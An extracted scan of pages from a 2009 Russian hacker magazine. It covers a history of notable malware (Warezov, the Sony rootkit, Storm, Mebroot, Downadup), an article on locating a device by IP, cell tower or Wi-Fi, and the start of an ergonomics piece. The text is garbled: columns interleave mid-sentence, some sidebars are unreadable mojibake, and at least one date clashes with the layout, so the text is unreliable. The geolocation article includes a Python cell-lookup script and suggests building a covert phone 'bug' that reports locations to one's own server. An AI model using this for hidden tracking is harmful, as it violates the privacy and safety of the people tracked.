измерялось сотнями тысяч, а в пике эпидемии 

речь шла о миллионах. В Финляндии были 

отменены рейсы местной авиакомпании, во 

многих странах закрыты некоторые отделения 

крупнейших банков. Автором заразы оказался 

18-летний немецкий студент Свен Яшан, хотя 

изначально разрабатывался «русский след». 

Юного вредителя заложил кто-то из своих, 

позарившись на обещанное Microsoft’ом 

награждение в 250.000 баксов. Помимо Sasser, 

на компьютере парнишки нашли еще и многочисленные 

модификации червя Netsky. 

XÀÊÅÐ 04 /124/ 09 

023

pc_zone 

Sony rootkit 

Warezov 

BSOD ИЗ-ЗА КОРЯВЫХ ДРАЙВЕРОВ SONY ROOTKIT 

ВРЕМЕННЫЙ ФАЙЛ WAREZOV 

2005 2006 2007 

На дворе — 2006 год, 

Warezov 

только вот ушастые 

пользователи по-прежнему открывают все 

вложения в письмах, а программно им мало кто 

запрещает это делать. Результат? Огромный 

ботнет Warezov (он же Stration), который авторы 

сумели собрать за счет одноименного червя, 

рассылаемого по email. Никаких сплоитов и 

уязвимостей, — социальная инженерия и людская 

тупость. И ведь повсю трубят: «Не открывай 

вложений» — так ведь все равно кликают. 

Особенность червя Warezov — в огромном 

количестве вариаций, которые появлялись, как 

грибы после дождя. Был момент, когда новые 

модификации появлялись чуть ли не раз в 30 

минут. Даже с обновленными антивирусными 

Storm 

Ботнет, созданный с 

помощью червя Storm, 

можно смело назвать произведением искуства. 

Децентрализованная P2P-сеть, в которой 

большинство хостов сидит тихо и ждет указаний. 

Доменные имена разрешаются в постоянно 

меняющиеся IP-адреса (опять же fast-flux 

domains). Часть кода червя — полиморфная. 

В пике — более миллиона инфицированных 

хостов. Как это удалось? 

Эпидемия червя началась с компьютеров 

в Европе и Соединенных Штатах 19 января 

2008 года, когда, прикрываясь темой урагана 

базами многие юзеры оставались не у дел. 

Впоследствии, когда на веб-серверах глобально 

начали вычищать все письма со зловредными 

аттачами, модификации перекинулись 

на IM-сети. А один из вариантов Warezov стал 

первым червем, который распространялся 

через Skype! 

Как и подобает трою для ботнета, тело Warezov 

позволяло владельцам загрузить на компьютер 

любую заразу. Червь содержит в себе список 

жестко прописанных URL-адресов (что, конечно, 

минус), которые он проверяет на наличие 

файлов. В случае если по какому-либо из этих 

адресов будет размещен файл, он загрузится в 

систему и запустится. Основной модуль Warezov 

способен завершать различные процессы, а 

в Европе, пользователям повалились письма 

с предложением открыть вложенный файл с 

названиями Full Clip.exe, Full Story.exe, Read 

More.exe или Video.exe. 

Все попавшиеся на удочку машины автоматически 

объединялись в ботнет, но в отличие от 

других сетей, он не использовал специальный 

управляющий сервер, доступ к которому легко 

перекрыть. Принцип управления Storm больше 

напоминает пиринговую сеть, в которой 

зараженные ноды подключаются к своему 

управляющему хосту (он руководит обычно 

30-45 зомби), а хосты взаимодействуют между 

Забавный факт: это 

Sony rootkit 

единственный руткит, 

который распространялся легально! Win32/ 

Rootkit.XCP, или «sony rootkit», является частью 

системы защиты аудио-CD,выпускаемых Sony 

BMG. Растроенная всепоглощающим пиратством 

компания решила бороться с нелегальным 

копированием с помощью DRM-компонентов 

(Digital Rights Management), а в попытке скрыть 

их присутствие в системе обратилась в компанию 

First 4 Internet, чтобы те написали маскирующий 

руткит. В итоге, система защиты дисков 

вместе с руткитом стала инсталлироваться на 

компьютер пользователя автоматически, когда 

в привод вставляется защищенный компактдиск. 

После установки, в системе появлялись 

два новых сервиса, которые и выполняли все 

функции. Установленный драйвер $sys$aries 

(aries.sys) скрывает все файлы и ключи в реестре, 

которые начинаются с «$sys$» посредством 

перехвата нативных API-функций. Win32/ 

Rootkit.XCP отслеживает обращения к System 

Service Table (SST) и перехватывает обращения 

к функциям: NtCreateFile, NtEnumerateKey, 

NtOpenKey, NtQueryDirectoryFile, 

NtQuerySystemInformation. В результате удается 

скрыть присутствие ключей в реестре, папок, 

файлов и процессов. 

Ты спросишь: а в чем, собственно, трабл? Ну, 

скрывает этот руткит работу нужных ему компонентов, 

что с того? Очень просто. Сразу после 

появления руткита, Марк Руссинович в своем 

блоге рассказал о многочисленных брешах в 

собственной защите программы. И был прав: 

очень скоро механизм, предназначенный для 

сокрытия файлов и процессов, быстро приспособили 

для своих нужд кодеры вирусов. Более 

того, распространение этого ноу-хао само по 

себе приводило к нестабильности системы, 

зависанию компьютера и потере данных из-за 

кривых драйверов, установленных в систему. И 

даже тогда, когда Sony выпустила специальную 

тулзу, избавиться от это дряни полностью было 

очень и очень затруднительно. 

также останавливать и удалять службы антивирусных 

программ и персональных брандмауэров. 

Для организации рассылки червь 

использует собственный SMTP-сервер. Главное 

использование ботнета — это, конечно же, 

спам. Однако многие ноды служили для хостинга 

так называемых fast-flux платформ, позволяя 

спамерам прятать настоящее расположение 

их спамерских сайтов за IP-адресом жертвы. IP 

менялся настолько часто, что его невозможно 

было прикрыть. Warezov достигал этого двумя 

средствами: во-первых, reverse HTTP proxy, которая 

получала контент с настоящего (скрываемого) 

сайта, а также DNS-сервера, на котором 

специальная версия Bind под Windows меняла 

записи по нужному алгоритму. 

друг другом. Причем роль хоста в случае необходимости 

может занять любая из нод. Вся 

сеть устроена так, что полного списка нодов 

нет ни у кого, поэтому точные размеры ботнета 

так и остались загадкой. По разным подсчетам, 

он варьировался от одного до нескольких 

миллионов машин. 

Помимо функций по работе с ботнетом, Storm 

устанавливает в системе руткит: Win32.agent. 

dh, посредством которого держатели ботнета 

могли стащить любую конфиденциальную 

инфу, рассылать спам и устраивать мощные 

DDoS-атаки. 

024 

XÀÊÅÐ 04 /124/ 09

pc_zone 

С MEBROOT’ОМ ДО СИХ ПОР СПРАВЛЯЮТСЯ ДАЛЕКО НЕ ВСЕ АНТИВИРУСЫ 

ТЕХНИКА FAST-FLUX В КАРТИНКАХ 

РАЗНЫЕ СПОСОБЫ РАСПРОСТРАНЕНИЯ ЧЕРВЯ 

DOWNADUP 

Merboot 

COMPROMISED 

PCs 

NS.SUPERSAMEAS.COM 

STORM BOTNET 

211.51.164.123 

ЧЕРЕЗ ВНЕШНИЕ НОСИТЕЛИ, 

ИСПОЛЬЗУЯ АВТОЗАПУСК 

ПРОПАТЧЕННЫЕ СИСТЕМЫ 

С НАДЕЖНЫМ ПАРОЛЕМ 

НА СИСТЕМНЫЕ ШАРЫ 

2 

Downadup 

1 

HOME 

PC 

3 

QUERY: 

WWW.SUPERSAMEAS.COM 

HTTP GET:211.51.164.123 

MS08-067 

Storm 

ЧЕРЕЗ «СЕТЕВОЕ ОКРУЖЕНИЕ», 

ПЕРЕБИРАЯ ПАРОЛЬ АДМИНИСТРАТОРА 

К СИСТЕМНОЙ ШАРЕ ADMIN$ 

ИСПОЛЬЗУЯ ЭКСПЛОИТ 

ДЛЯ УЯЗВИМОСТИ MS08-067, 

НАЙДЕННОЙ ВО ВСЕХ ВЕРСИЯХ 

WINDOWS 

2008 2009 

Merboot Загрузочные вирусы, 

о которых все благополучно 

успели забыть, возвращаются. В 2005 

году на хакерской конференции Black Hat 

специалисты eEye Digital Security продемонстрировали 

концепт так называемого буткита, 

размещающего в загрузочном секторе диска 

код, который перехватывает загрузку ядра 

Windows и запускает бэкдор с возможностью 

удаленного управления по локальной 

сети. Презентация прошла на ура, а в 2008 

году, после длительного затишья в области 

Downadup 

Червя, нашумевшего в 

январе, называют по-разному: 

Downadup, Conficker, Kido. Важно одно: 

новой малваре за несколько дней удалось 

заразить миллионы компьютеров, и собранный 

ботнет функционирует до сих пор. Разработчикам 

удалось лихо диверсифицировать способы 

распространения, объединив в одном черве 

сразу несколько успешных методик. Самый 

эффективный способ — приватный сплоит, 

использующий непропатченную систему с 

уязвимостью переполнения буфера MS08-067 в 

сервисе «Сервер» (патч вышел еще в октябре). 

Для этого червь отсылает удаленной машине 

специальным образом сформированный RPCзапрос, 

вызывающий переполнение буфера 

при вызове функции wcscpy_s в библиотеке 

руткитов, выстрелил Mebroot. Новый троян 

использовал представленную еще в 2005 году 

идею и размещал свое тело в бут-секторе 

диска, после чего вносил модификации в 

ядро Винды, которые затрудняли обнаружение 

вредоносного кода антивирусами. 

Подцепить заразу мог кто угодно: компы 

заражались через свежие сплоиты с популярных 

сайтов. Вредоносный код сначала 

изменяет MBR (главная загрузочная запись), 

записывает руткит-части в сектора диска, 

извлекает из себя и устанавливает бэкдор 

netapi32.dll. На компьютере запускается специальный 

код-загрузчик, который скачивает с 

уже зараженной машины исполняемый файл 

червя и запускает его. 

Кроме этого, червь отлично тиражирует себя 

через «Сетевое окружение», перебирая 

пароль администратора к системной шаре 

ADMIN$. А давно известный способ распространения 

через флешки претерпел изменения: 

в результате обфускации Autorun.inf 

(разработчики просто добавили в файл кучу 

мусора) удалось обмануть многие сигнатурные 

антивирусы. Несколько способов = 

максимальный эффект! Другая ключевая 

особенность заключается в том, как червь 

скачивает на зараженную машину трояна (для 

дальнейшей рассылки вируса, DDoS’а и т.д.). 

в Windows, после чего самоудаляется. В 

результате заражения, в MBR размещаются 

инструкции, передающие управление основной 

части руткита, размещенного в разных 

секторах жесткого диска. Именно эта часть, 

уже после загрузки системы, перехватывает 

API-функции и скрывает зараженный MBR. 

Кроме традиционных функций по сокрытию 

своего присутствия в системе, вредоносный 

код устанавливает в Windows бэкдор, который 

занимается кражей банковских аккаунтов. 

Разработчики отказались от размещения 

файлов на каком-то жестко зафиксированном 

серваке. Вместо этого код червя получает 

на нескольких популярных ресурсах текущую 

дату и по ней генерирует список из 250 

доменов, используя специальный алгоритм. 

Задача хозяев ботнета — заблаговременно 

эти домены зарегистрировать и разместить 

там файлы для загрузки. Противостоять этому 

не столько сложно, сколько дорого. 

Перехватывая API-вызовы, отвечающие 

за обращение к DNS, заразе долгое 

время удавалось сдерживать антивирусы, 

которые банально не могли обновиться, обращаясь 

к заблокированным доменам, содержащим 

слова kaspersky, nod, symantec, 

microsoft и т.д. z 

XÀÊÅÐ 04 /124/ 09 

025

pc_zone 

СТЕПАН ИЛЬИН 

/ STEP@GAMELAND. RU/ 


БЕЗ GPS 

Как определить свои координаты по IP, GSM/UMTS и Wi-Fi 

Тысячи лет назад о такой штуке, как GPS, никто не мог даже мечтать. 

Но моряки и путешественники отлично справлялись с навигацией, 

используя компас и карты, солнце и звезды. Сейчас — век цифровой, 

но тоже есть немало способов определить месторасположение без 

всяких там систем глобального позиционирования. 

Спору нет, GPS — классная штука, но что делать, если приемника 

под рукой нет? Далеко не у каждого есть встроенный чип в мобиле. 

Да и владелец автомобиля совсем не обязательно успел обзавестись 

устройством навигации. Так как же быть? Если не брать в расчет редкие и 

экзотические варианты, то основных способа три: 

1. Определить IP и с помощью специальной базы данных определить 

город, в котором находишься, и нередко — долготу и широту. 

2. Определить расположение по находящимся рядом базовым станциям 

GSM/UMTS. Это возможно при наличии базы данных с идентификаторами 

вышек и их координатами. 

3. Использовать для вычисления широты и долготы информацию о 

находящихся рядом точках доступа Wi-Fi, передав запрос с их характеристиками 

на специальный сервер. 

Итак, начнем с самого простого. 

IP НАМ В ПОМОЩЬ 

Когда мне нужно проверить свой внешний IP, чтобы убедиться, 

например, что я включил VPN или прокси, я всегда использую сервис 

ip2location.com. Приятно, что, помимо самого IP-адреса, выводится 

информация о провайдере, его месторасположении (город, страна, 

штат), а зачастую… еще и координаты. Само собой, в базе не будут 

указаны широта и долгота для самого обычного клиента интернет-услуг. 

Как правило, данные указываются для провайдера, реже — для крупных 

компаний, имеющих большие диапазоны статических IP. Получается, 

что, подключившись к сети (например, через любой открытый hotspot 

или просто воспользовавшись компьютером), можно с большой долей 

вероятности определить примерное место, где ты находишься. Конечно, 

способ примитивный — и более того, самый неточный из всех представленных 

в этой статье. С другой стороны, это реальный шанс определить 

месторасположение, всего лишь открыв страничку в интернете. А если 

сварганить специальный трекер, установить его на КПК и отслеживать 

IP-шники, которые он получает при коннекте к открытым WiFi-сетям, то 

реально вычислить передвижения девайса. 

Использовать сервис в чистом виде, а именно — переходя браузером 

по ссылке ip2location.com, скучно и беспонтово. Месторасположение на 

карте не увидеть, лог не сохранить, а сама страница слишком тяжелая 

для мобильного инета — короче, это не наш путь. От сервиса нам нужно 

только одно — база соответствий разных IP-адресов их расположению, 

которую ip2location предлагает приобрести за довольно разумные 

деньги. Само собой, подобные базы быстро расплываются по варезным 

порталам и торрентам, причем в двух вариантах: .cvs (текстовом) и .bin 

(бинарном). С такой базой несложно заточить любое приложение под 

себя. Правда, IP-адрес в базе хранится в специальном цифровом виде 

без точек и разделения на октеты, но следующая PHP-функция поможет 

привести обычный IP-шник к нужному виду: 

function Dot2LongIP ($IPaddr) 

{ 

if ($IPaddr == "") { 

return 0; 

} else { 

$ips = split ("\.", "$IPaddr"); 

return ($ips[3] + $ips[2] * 256 + $ips[1] * 256 * 256 

+ $ips[0] * 256 * 256 * 256); 

} 

} 

Имея такой ключ для адреса, ничего не стоит найти соответствующие 

026 

XÀÊÅÐ 04 /124/ 09

pc_zone 

База данных ip2location 

Определяем координаты по параметрам MNC, MCC, LAC, Cell ID базовой 

станции, к которой подключены 

Координаты по IP-адресу? Легко! Но очень неточно :) 

ему координаты в текстовой базе. Если же в распоряжении будет база 

в BIN-формате, то задача еще проще. Для Perl, C, Python, PHP, Ruby, 

C#, VB.NET, Java, Visual Basic сервисом подготовлены готовые модули 

(http://www.ip2location.com/developers.aspx), которые легко использовать 

в своем проекте. В случае с PHP достаточно закинуть на сайт модуль 

IP2Location.inc.php и создать несложный скриптик: 

 

Можно просто вывести на экран, залогировать или отобразить на карте с 

помощью Google Maps, передав широту и долготу в качестве параметра: 

http://maps.google.com/maps?f=l&hl=en&q='+query+'&near 

='+str(lat)+','+str(lng)+'&ie=UTF8&z=12&om=1 

XÀÊÅÐ 04 /124/ 09 

ИСПОЛЬЗУЕМ МОБИЛЬНЫЕ ВЫШКИ! 

Старая байка о том, что спецслужбы могут найти человека по сигналу 

от его мобильника — один из тех случаях, когда на самом деле все так и 

есть. Да чего там спецслужбы, если на это способна даже совершенно 

бесплатная программа Google Maps (www.google.com/gmm). 

По сути, это удобная оболочка для доступа к одноименному веб-сервису, 

позволяющему смотреть фотографии местности со спутника, рельеф и — во 

многих случаях — карты с возможностью проложить маршруты. Думаю, 

рассмотреть крышу своего дома через maps.google.com пробовали все. 

Работать с таким сайтом через браузер на мобильном телефоне (даже если 

это сверхскоростная Opera Mini) крайне сложно, поэтому в Google, подсуетившись, 

сделали удобную оболочку для просмотра карт. Оформили ее в 

виде приложения для самых разных платформ — от обычных мобильных, 

поддерживающих Java, до смартфонов и коммуникаторов на Windows 

Mobile и Symbian S60 3rd Edition, престижных BlackBerry, а теперь еще и 

Android, к которой мы пока не привыкли, но очень скоро будем воспринимать 

как одну из основных платформ для телефона. В том же iPhone Google 

Maps встроена по умолчанию. Так вот, помимо удобного просмотра этих 

самых карт и спутниковых снимков, у утилиты есть одна замечательная 

кнопка «Мое месторасположение». Один клик — и на карте отмечается 

нахождение телефона. Да, для владельцев трубок с GPS это сущая ерунда: 

нашли чем удивить! Но надо видеть лица тех пользователей, которые обнаружили 

на экране свое месторасположение, хотя никаких навигационных 

приблуд у них не было и в помине! Впрочем, это только так кажется. 

Телефонная трубка всегда находится в зоне действия, по меньшей 

мере, одной базовой станции сотовой сети. Ну, или не находится — но в 

этом случае от нее толку не более чем от кирпичика. Любая из базовых 

станций имеет некоторый набор параметров, которые получает 

телефон — благодаря этому каждую БС можно распознать. Один из таких 

параметров — CellID (сокращенно CID) — уникальный номер для каждой 

соты, выданный оператором. Зная его, ты можешь распознать базовую 

станцию, а зная расположение базовой станции, можешь понять, 

где находишься. Точность варьируется от нескольких сотен метров до 

нескольких километров, но это неплохая отправная точка, чтобы разобраться 

с координатами. 

Получается, имея в наличии табличку, где в соответствии с каждой 

базовой станцией будет сопоставлены ее координаты, можно примерно 

вычислить положение абонента. А раз Google Maps может так лихо определять 

месторасположение человека, то у него такая база данных есть. 

Но откуда? Расположение базовых станцией различных операторов — 

пускай и не секретная, но вряд ли открытая информация. Даже учитывая 

масштабность проектов Гугла, с трудом можно поверить, что тот договорился 

со всеми операторами сотовой связи — определение местоположения 

работает в любом месте (забегая вперед, скажу, что правильнее 

говорить «может работать в любом месте»). Ответ скрывается в лицензионном 

соглашении во время установки программы, на который мы, 

конечно же, забили и сразу нажали «Я согласен» :). А ведь там черным по 

белому написано, что, принимая соглашение, мы разрешаем программе 

анонимно передавать на сервер информацию о текущем расположении 

и информацию о сотовых вышках поблизости. Да! Базу данных с 

примерными координатами базовых станций составляют для Google 

сами пользователи Google Maps, имеющие на борту своих телефонов и 

коммуникаторов встроенный приемник GPS. И что самое классное: даже 

при полном отказе от использования как официальных, так и неофициальных 

(собранных энтузиастами с помощью специальных сканеров — 

подробнее читай во врезке) баз с расположением станций, функция для 

определения месторасположения работает на «ура». Проверь сам. 

GSM-НАВИГАЦИЯ СВОИМИ РУКАМИ 

Возможность посмотреть в программе свое расположение — само по 

себе здорово, но разве ж можно отказаться от соблазна использовать 

базы Google’а в корыстных целях? Как тебе, например, идея создать 

собственный трекер, который определял бы текущее расположение БС и 

передавал его на наш сервер? Эдакий жучок средствами самого телефона, 

который работает везде и всегда! 

Компания не разглашает протокол взаимодействия Google Maps, не публикуя 

API, однако его легко вскрыли, просто проснифав трафик и реверснув 

часть кода. Помимо http-запросов на загрузку карт, отчетливо видно, 

что программа отправляет запросы по адресу http://www.google.com/ 

glm/mmap, причем именно тогда, когда пользователь желает получить 

текущее месторасположение. Вот и попался наш скриптик — в качестве 

027

pc_zone 

links 

• Параметры Google 

Maps: mapki.com/ 

wiki/Google_Map_ 

Parameters. 

• Делаем GPS-адаптер 

для мобильного 

телефона своими 

руками: 

tinkerlog.com/2007/ 

07/13/interfacing-anavr-controller-to-agps-mobile-phone. 

• Мануал по получению 

координат 

по данным сотовой 

точки через Yahoo: 

developer.yahoo. 

com/yrb/zonetag/ 

locatecell.html. 

• Реализация работы 

с базой данных 

Google Maps. 

На PHP: http://www. 

witracks.com.br/ 

gmaps.txt. 

j2me: http://www. 

mapnav.spb.ru/site/ 

e107_plugins/forum/ 

forum_viewtopic. 

php?9736. 

На Python для S60: 

http://blog.jebu. 

net/2008/07/googlecell-tower-mappingwith-python-on-s60. 

На C#: http://maps. 

alphadex.de/datafiles/ 

fct0e1b11782832f02. 

cs. 

На Delphi: http:// 

forum.netmonitor.ru/ 

about4470-0-asc-60. 

html. 

dvd 

Все описанные 

скрипты, утилиты для 

трекинга и навигации 

ты найдешь на нашем 

диске. 

Скрипт для взаимодействия с сервисом Google 

параметров ему передаются технические значения базовой 

станции: MCC, MNC, LAC и CellID. 

MCC — êîä ñòðàíû (äëÿ Ðîññèè — 250) 

MNC — êîä ñåòè (ÌÒÑ — 01, Ìåãàôîí — 02, Áèëàéí — 

99 è ò.ï.) 

LAC — êîä ëîêàëüíîé çîíû (äðóãèìè ñëîâàìè, 

ñîâîêóïíîñòè áàçîâûõ ñòàíöèé, îáñëóæèâàåìûõ 

îäíèì êîíòðîëëåðîì) 

CellID (CID) — èäåíòèôèêàòîð, ñîñòîèò èç íîìåðîâ 

áàçîâîé ñòàíöèè è ñåêòîðà 

Зная, куда посылать данные, осталось эти значения 

получить! Наиболее простой способ — прямо в программе 

Google Maps перейти в «Справку», там щелкнуть «Общие 

сведения», и в самом конце этой странички будет строка 

с параметрами в формате myl:MCC:MNC:LAC:CellID. Куда 

больший простор для деятельности предоставляют специальные 

программы netmonitor’ы: с их помощью можно 

логировать параметры при переключении от одной станции 

к другой, извлекать параметры «соседей» (находящихся 

в поле зрения других БС), да и просто получать куда 

более подробную информацию. Для каждой платформы 

есть свои реализации нетмониторов с различными возможностями 

— ты можешь выбрать программу под себя, 

почитав врезку. 

Теперь, когда все необходимые параметры получены, 

можно обратиться на сервер и попробовать получить ответ. 

Приведу для этого несложный скрипт на Python’е, который 

написал наш соотечественник Skvo и опубликовал на форуме 

forum.netmonitor.ru: 

net, cid, lac = 25002, 9164, 4000 

import urllib 

a = ‘000E00000000000000000000000000001B000000 

0000000000000000030000’ 

b = hex(cid)[2:].zfill(8) + hex(lac)[2:]. 

zfill(8) 

c = hex(divmod(net,100)[1])[2:].zfill(8) + 

hex(divmod(net,100)[0])[2:].zfill(8) 

string = (a + b + c + ‘FFFFFFFF00000000’). 

decode('hex') 

try: 

data = urllib.urlopen('http://www.google. 

com/glm/mmap',string) 

r = data.read().encode('hex') 

if len(r) > 14: 

print float(int(r[14:22],16))/1000000, 

float(int(r[22:30],16))/1000000 

else: 

NetMonitor для Symbian 

показывает нужные 

нам параметры базовой 

станции 

print 'no data in google' 

except: 

print ‘connect error’ 

Навигация через Wi-Fi: на 

карте обозначены такие же 

пользователи 

Для запуска, естественно, потребуется интерпретатор 

Python’а (обязательно 2-й ветки, потому как на 3-й не 

запустится), который можно скачать с сайта http://python. 

org/download/releases. В первой строке скрипта, как 

несложно догадаться, необходимо подставить NET (MCC и 

MNC, написанные слитно), CID, LAC. В результате скрипт 

сформирует запрос на сервер http://www.google.com/ 

glm/mmap и отправит его. Если базовая станция с этими 

параметрами есть в базе, то на экран выведутся координаты, 

например, «59.200274 39.836925». В противном случае 

скрипт выдаст ошибку: «no data in google». Любителям 

программировать не составит труда добавить пару строчек, 

например, по указанным NET и LAC перебрать все 

варианты CID (от 1 до 65536), и, посмотрев, какие сектора 

имеются у Гугла, узнать их примерные координаты. Если 

тебе неохота морочить голову скриптами, на наш диск мы 

выложили GUI-программу, написанную на C# (исходники 

прилагаются). В этом случае ты автоматически получишь 

еще и ссылку, отображающую координаты на сайте Google 

Maps. Ссылки на реализации на других языках смотри в 

боковом выносе. Интересно, что на сервер передаются 

всего лишь три параметра, причем ключевыми являются 

только значения LAC и CellID. А MCC/MNC необходимы на 

тот случай, если в базе есть несколько пар с одинаковыми 

LAC, CellID. При этом телефон может получать намного 

больше информации о текущей станции — взять хотя бы 

мощность сигнала, однако эти параметры в расчетах не 

используются. Получается крайне простой алгоритм. Один 

сектор — одна координата; независимо от того, находится 

ли пользователь в 100 метрах от базовой станции или в 

километре от нее, координата будет одинаковая! 

Отдельно хочу сказать, что замечательный проект «Яндекс. 

Карты», который я особенно люблю за возможность отображения 

точек, имеет точно такой же функционал. И ровно так 

же, как и Google, предоставляет своей программе данные о 

точке по запросу с указанием Cell ID, LAC, NET параметров: 

http://mobile.maps.yandex.net/cellid_locati 

on/?&cellid=%d&operatorid=%d&countrycode=%d 

&lac=%d 

Единственное отличие в том, что ответ сервис «Яндекса» 

возвращает в XML-формате, который легко и удобно парсится 

для извлечения любых параметров. 

028 

XÀÊÅÐ 04 /124/ 09

pc_zone 

Если данные о БС есть у Google, то сервер возвращает ее координаты 

КАК ЗАСТАВИТЬ РАБОТАТЬ НАВИГАЦИОННЫЕ ПРОГРАММЫ 

Какой бы замечательной ни была программа Google Maps, использовать 

ее в качестве навигационного инструмента, мягко говоря, затруднительно. 

Было бы здорово, пускай и примерные, но все-таки координаты 

скормить нормальной программе навигации, с хорошими картами, 

подробной адресацией и проработанными алгоритмами прокладки маршрута. 

Некоторые программы, например, «Навител» и «Автоспутник» 

имеют еще один плюс: они умеют подгружать информацию о пробках и 

учитывать ее при составлении маршрута. Чисто теоретически, ничего не 

стоит написать подобное приложение самому. Алгоритм прост: 

1. Получаем текущие координаты при каждой смене базовой станции; 

2. Отправляя запрос на спутник, получаем примерные координаты; 

3. Эмулируем в системе последовательный порт и в простом формате NMEA, 

который используют GPS-навигаторы, транслируем туда текущие координаты. 

Именно этот принцип лежит в программе VirtualGPS (www.kamlex.com), 

предназначенной для устройств на платформе Windows Mobile 2003, WM 

5, WM 6, WM 6.1. Бесплатная lite-версия программы определяет текущее 

расположение по вышкам сотовой связи и эмулирует GPS. После запуска 

прога создает в системе новый порт, который нужно указать в настройках 

любимой навигационной программы — и та, ничего не подозревая, будет 

считать, что подключена к настоящему GPS-приемнику. 

НА ЧТО СПОСОБЕН WI-FI 

Будучи раздосадован тем, что большинство WiFi-точке в городе либо 

закрыты, либо платные, подумай о том, что и им можно найти применение. 

Полагаю, не надо говорить для чего :). Принцип точно такой же: 

определив все точки доступа поблизости, отправляем информацию 

о MAC-адресах (добавляя при желании идентификатор сети SSID) на 

специальный сервис. Тот проверяет их координаты и выдает тебе твое 

примерное расположение. Такая технология давно функционирует в 

Штатах, где покрытие Wi-Fi зашкаливает настолько, что скрыться от него 

уже, похоже, негде. WPS (Wi-Fi Positioning System) предоставляет компания 

SKYHOOK Wireless (www.skyhookwireless.com), разработавшая 

клиентские приложения для разных платформ и собрав первоначальную 

базу с точками доступа. Быстро появились и альтернативные приложения, 

которые, используя API-сервиса, получают координаты пользователя. 

Среди них — замечательный плагин для Firefox’а Geode (http:// 

labs.mozilla.com/geode_welcome), который подставляет информацию 

о текущем местоположении на любом веб-сайте (во время создания 

нового поста в блог, например). 

Ïðîãðàììû 

NetMonitor 

×òîáû ïîíèìàòü, êàêóþ áàçîâóþ ñòàíöèþ òåëåôîí èñïîëüçóåò â 

òåêóùèé ìîìåíò, è ïîëó÷èòü åå ïàðàìåòðû, ïîíàäîáÿòñÿ ñïåöèàëüíûå 

ïðîãðàììû. Ê ñîæàëåíèþ, óíèâåðñàëüíîé ïðîãðàììû 

íåò, ïîýòîìó äëÿ êàæäîé ïëàòôîðìû ïðèäåòñÿ íàéòè ïîäõîäÿùèé 

èíñòðóìåíò! 

Symbian: FieldTest, CellTrack, Best GSMNavigator 

Windows Mobile 2005: GPS Cell 

Windows Mobile 5.0/6.0: NetMonitor32, WMCellCatcher, 

CellProfileSwitcher (çàìå÷ó, ÷òî íå âñå ïðîãðàììû ðàáîòàþò ñî 

âñåìè ðàäèî-ïðîøèâêàìè) 

XÀÊÅÐ 04 /124/ 09 

Определяем месторасположение 

в 

Google Maps 

Увы, в России хоть как-то заставить работать SKYHOOK мне так и не 

удалось. Зато наши соотечественники вплотную взялись за реализацию 

подобной идеи, воплотив в жизнь сервис Wi2Geo (wi2geo.ru), который 

мне почему-то очень хочется назвать Wi2Go :). Ребята уже сейчас предоставляют 

приложения для Windows Mobile, Symbian, Windows и Mac OS 

X, а для навигации используют базу IP-адресов, информацию о ячейках 

GSM и, собственно, точках доступа Wi-Fi. Базы никому не запрещено использовать 

в своих целях, воспользовавшись открытым API (http://labs. 

wi2geo.ru/basicapi.php). Огорчает только, что проект будет развиваться 

только в тех городах, где большое покрытие Wi-Fi. А таковым пока можно 

назвать только Москву. 

А КАК ЖЕ ТРЕКИНГ? 

Функция «Локатор» 

позволяет в реальном 

времени отслеживать, 

где находятся твои 

друзья 

Клиентская часть 

трекера, которая 

отсылает текущие 

координаты девайса 

на специальный вебсервер 

Выше мы говорили о трекинге пользователя — системе, позволяющей 

в реальном времени отследить положение пользователя на карте. 

Неплохо, если бы подобную штуку установили на свои телефоны все 

друзья. Тогда ничего бы не стоило узнать, кто где, и при необходимости 

— договориться о встрече. Ребята из Google реализовали это в функции 

Google Latitude, с недавнего времени доступной опять же пользователям 

мобильных Google Maps. К сожалению, через браузер просмотреть 

расположение друзей можно только в Штатах, но ведь ничего не мешает 

использовать американский прокси? 

Есть и другой вариант. На сайте http://forum.xda-developers.com/ 

showthread.php?t=340667 совершенно бесплатно можно скачать специальную 

программу для трекинга, клиентская часть которой устанавливается 

на коммуникатор на базе WM, а серверная — на любой веб-сервер. 

Далее положение объекта можно просмотреть через программу Google 

Earth. Реально работающее решение для бизнеса, которое с учетом 

открытых исходников несложно доработать под себя! z 

Î áàçîâûõ ñòàíöèÿõ 

ñîòîâûõ ñåòåé 

Â ñòàòüå ÿ óïîìèíàë î íåîôèöèàëüíûõ áàçàõ äàííûõ ñ ðàñïîëîæåíèåì 

âûøåê ðàçëè÷íûõ ñîòîâûõ ñåòåé. Â èíòåðíåòå ñóùåñòâóåò 

íåìàëî ïðîåêòîâ, ãäå ýíòóçèàñòû äåëÿòñÿ ñîáðàííîé íåòìîíèòîðàìè 

èíôîðìàöèåé. Èç èíîñòðàííûõ ýòî — celldb.org/aboutapi. 

php, www.opencellid.org/api, http://gsmloc.org/code, cellid.telin. 

nl. Êàæäûé èç íèõ èìååò ïðîñòîé API äëÿ ïîëó÷åíèÿ êîîðäèíàò ñ 

ïîìîùüþ îáû÷íîãî HTTP-çàïðîñà, ïðè ýòîì â êà÷åñòâå ïàðàìåòðîâ 

óêàçûâàþòñÿ òðàäèöèîííûå MCC, MNC, Cell ID è LAC. 

Îòäåëüíî õî÷ó óïîìÿíóòü íàø ðóññêèé ïðîåêò Netmonitor.ru, â 

êîòîðîì ñîáðàíà èíôà î áîëüøîì êîëè÷åñòâà ÁÑ Ìåãàôîíà, ÌÒÑ, 

Áèëàéíà, ÒÅËÅ2 è äàæå Skylink. Ê òîìó æå, íà ñàéòå ðàñïîëàãàåòñÿ 

åùå è êðóïíåéøèé ôîðóì äëÿ èññëåäîâàòåëåé ñîòîâûõ ñåòåé. 

029

pc_zone 

1) Укажи свой рост: 

152 155 157 160 163 165 168 170 173 175 178 180 183 185 188 191 

50-75 cм. 

Твой рост 

178 cм. 

Уровень глаз при 

работе стоя 

Уровень 

глаз 

124 см. 

10 0 - 20 0 

166 см. 

Расположения 

логтей 

109 см. 

Высота 

кресла 

44 см. 

Уровень 

логтей 

67 см. 

2) А теперь обустрой свое рабочее место 

в соответствии с требованиями 

ВИТАЛИЙ ТРАВИН 

За своим рабочим 

место люди 

зачастую проводят 

большую часть 

дня. Самое время 

задуматься об эргономике 

/ VITYA31@MAIL.RU/ 

КОГДА 

ТЫ СТАНЕШЬ СЛЕПЫМ 

Это только сейчас кажется, что здоровье будет всегда. 

Если продолжать пялиться в старый монитор 18 часов в сутки, сидя на 

кухонной табуретке и пожевывая гамбургер, здоровью рано или поздно 

придет конец! И это я тебе точно говорю. 

>> pc_zone 

Перспективы не самые радужные, правда? 

